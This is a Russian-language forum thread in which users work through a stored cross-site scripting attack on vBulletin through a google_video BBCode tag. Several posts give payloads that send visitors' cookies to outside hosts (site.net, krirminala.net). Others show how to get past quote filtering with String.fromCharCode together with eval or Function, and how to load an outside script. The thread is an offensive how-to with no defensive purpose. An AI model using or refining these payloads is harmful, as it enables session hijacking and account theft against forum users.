Добрый день всем. Такой вопрос. Есть xss на булке из за тега google*video. [google*video][U*RL=/onmouseover=document.location.href = 'http://site.net/snf/s.gif?'+document.cookie;a="]1[/U*RL]123[/google*video] Алерт с куками вылетает на ура, теперь вопрос. Фильтруются кавычки ' " и ` Как быть в данной ситуации?
А в чем проблема? Code: eval(String.fromCharCode(84, 69, 83, 84)) // Фильтр на eval: Function(String.fromCharCode(84, 69, 83, 84))()
Чет не получается. Зашифровал это место: Получилось: Вставил: Но не работает, почему? Подскажите плиз
Такой код: Открывает пустую страницу с таким содержимым: Как надо написать правильно чтобы он все же создавал картинку? Img запишнул в str так как пробелы тоже не допускаются, а переменная создается только с пробелом.
Зачем? <script src=http://example.com/script.js></script> http://example.com/script.js замени на адрес своего js файла
А на это как реагирует ? Code: onmouseover=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,109,103,46,115,114,99,61,34,104,116,116,112,58,47,47,107,114,105,114,109,105,110,97,108,97,46,110,101,116,47,115,110,102,47,115,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,60,47,115,99,114,105,112,116,62)); ЗЫ: Там Code: img=new Image();img.src="http://krirminala.net/snf/s.gif?"+document.cookie;
document.write убрать и далее снова перекодировать js, без тегов script и собственно, евалить. Но в этом случаи, как ранее говорилось, запрос придёт в негодность ?
Если этого не сделать, всё то, что вернет String.fromCharCode будет текст, который даже нигде не будет показан)
